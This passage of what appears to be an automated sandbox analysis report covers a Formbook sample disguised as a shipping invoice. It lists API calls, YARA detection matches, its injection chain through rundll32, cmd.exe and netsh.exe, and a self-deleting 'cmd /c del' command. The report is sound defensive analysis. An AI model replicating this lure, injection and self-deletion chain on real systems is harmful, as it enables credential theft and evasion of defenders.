          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,2_2_04B79780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,2_2_04B79FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,2_2_04B79710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,2_2_04B79860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk,2_2_04B79840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk,2_2_04B799A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_04B79910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk,2_2_04B79A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk,2_2_04B79A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B795F0 NtQueryInformationFile,2_2_04B795F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7AD30 NtSetContextThread,2_2_04B7AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79520 NtWaitForSingleObject,2_2_04B79520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79560 NtWriteFile,2_2_04B79560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B796D0 NtCreateKey,2_2_04B796D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79610 NtEnumerateValueKey,2_2_04B79610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79670 NtQueryInformationProcess,2_2_04B79670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79660 NtAllocateVirtualMemory,2_2_04B79660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79650 NtQueryValueKey,2_2_04B79650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79730 NtQueryVirtualMemory,2_2_04B79730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A710 NtOpenProcessToken,2_2_04B7A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79770 NtSetInformationFile,2_2_04B79770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A770 NtOpenThread,2_2_04B7A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79760 NtOpenProcess,2_2_04B79760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B798A0 NtWriteVirtualMemory,2_2_04B798A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B798F0 NtReadVirtualMemory,2_2_04B798F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79820 NtEnumerateKey,2_2_04B79820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7B040 NtSuspendThread,2_2_04B7B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B799D0 NtCreateProcessEx,2_2_04B799D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79950 NtQueueApcThread,2_2_04B79950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A80 NtOpenDirectoryObject,2_2_04B79A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A10 NtQuerySection,2_2_04B79A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A00 NtProtectVirtualMemory,2_2_04B79A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A3B0 NtGetContextThread,2_2_04B7A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79B00 NtSetValueKey,2_2_04B79B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_008054E0 NtDelayExecution,2_2_008054E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0080318C NtWriteVirtualMemory,2_2_0080318C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk,9_2_03749A50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_03749910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk,9_2_037499A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk,9_2_03749860
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk,9_2_03749840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk,9_2_03749710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk,9_2_03749FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk,9_2_03749780
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_037496E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk,9_2_037496D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749540 NtReadFile,LdrInitializeThunk,9_2_03749540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495D0 NtClose,LdrInitializeThunk,9_2_037495D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749B00 NtSetValueKey,9_2_03749B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A3B0 NtGetContextThread,9_2_0374A3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A20 NtResumeThread,9_2_03749A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A10 NtQuerySection,9_2_03749A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A00 NtProtectVirtualMemory,9_2_03749A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A80 NtOpenDirectoryObject,9_2_03749A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749950 NtQueueApcThread,9_2_03749950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037499D0 NtCreateProcessEx,9_2_037499D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374B040 NtSuspendThread,9_2_0374B040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749820 NtEnumerateKey,9_2_03749820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498F0 NtReadVirtualMemory,9_2_037498F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498A0 NtWriteVirtualMemory,9_2_037498A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A770 NtOpenThread,9_2_0374A770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749770 NtSetInformationFile,9_2_03749770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749760 NtOpenProcess,9_2_03749760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749730 NtQueryVirtualMemory,9_2_03749730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A710 NtOpenProcessToken,9_2_0374A710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037497A0 NtUnmapViewOfSection,9_2_037497A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749670 NtQueryInformationProcess,9_2_03749670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749660 NtAllocateVirtualMemory,9_2_03749660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749650 NtQueryValueKey,9_2_03749650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749610 NtEnumerateValueKey,9_2_03749610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749560 NtWriteFile,9_2_03749560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374AD30 NtSetContextThread,9_2_0374AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749520 NtWaitForSingleObject,9_2_03749520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495F0 NtQueryInformationFile,9_2_037495F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782B0 NtClose,9_2_02F782B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78230 NtReadFile,9_2_02F78230
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78180 NtCreateFile,9_2_02F78180
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782DA NtClose,9_2_02F782DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782AC NtClose,9_2_02F782AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7817A NtCreateFile,9_2_02F7817A
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004069430_2_00406943
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040711A0_2_0040711A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10001BB01_2_10001BB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100047001_2_10004700
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100063251_2_10006325
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB172_2_0041CB17
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB1A2_2_0041CB1A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B4662_2_0041B466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C2B2_2_00408C2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C302_2_00408C30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B30D202_2_04B30D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C01D552_2_04C01D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B56E302_2_04B56E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B0902_2_04B4B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF10022_2_04BF1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B541202_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3F9002_2_04B3F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6EBB02_2_04B6EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AB409_2_0372AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037ACB4F9_2_037ACB4F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2B289_2_037D2B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A3099_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E39_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C03DA9_2_037C03DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373ABD89_2_0373ABD8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CDBD29_2_037CDBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373EBB09_2_0373EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B2369_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFA2B9_2_037BFA2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D22AE9_2_037D22AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037241209_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370F9009_2_0370F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A8309_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DE8249_2_037DE824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C10029_2_037C1002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D28EC9_2_037D28EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A09_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D20A89_2_037D20A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B0909_2_0371B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1FF19_2_037D1FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DDFCE9_2_037DDFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03726E309_2_03726E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD6169_2_037CD616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2EF79_2_037D2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1D559_2_037D1D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03700D209_2_03700D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2D079_2_037D2D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E09_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D25DD9_2_037D25DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037325819_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D829_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B4779_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD4669_2_037CD466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371841F9_2_0371841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C44969_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB179_2_02F7CB17
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB1A9_2_02F7CB1A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62FB09_2_02F62FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B4669_2_02F7B466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C309_2_02F68C30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C2B9_2_02F68C2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D909_2_02F62D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D879_2_02F62D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0370B150 appears 136 times
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/27@11/6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,1_2_100019C0
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\nse53A6.tmpJump to behavior
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,LychnisesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
          Source: Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
          Source: Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, netsh.exe
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: MakeCert.pdb source: makecert.exe.0.dr
          Source: Binary string: guidgen.pdb source: guidgen.exe.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_1000734B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100046E5 push ecx; ret 1_2_100046F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041C952 push es; ret 2_2_0041C954
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B375 push eax; ret 2_2_0041B3C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3C2 push eax; ret 2_2_0041B3C8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3CB push eax; ret 2_2_0041B432
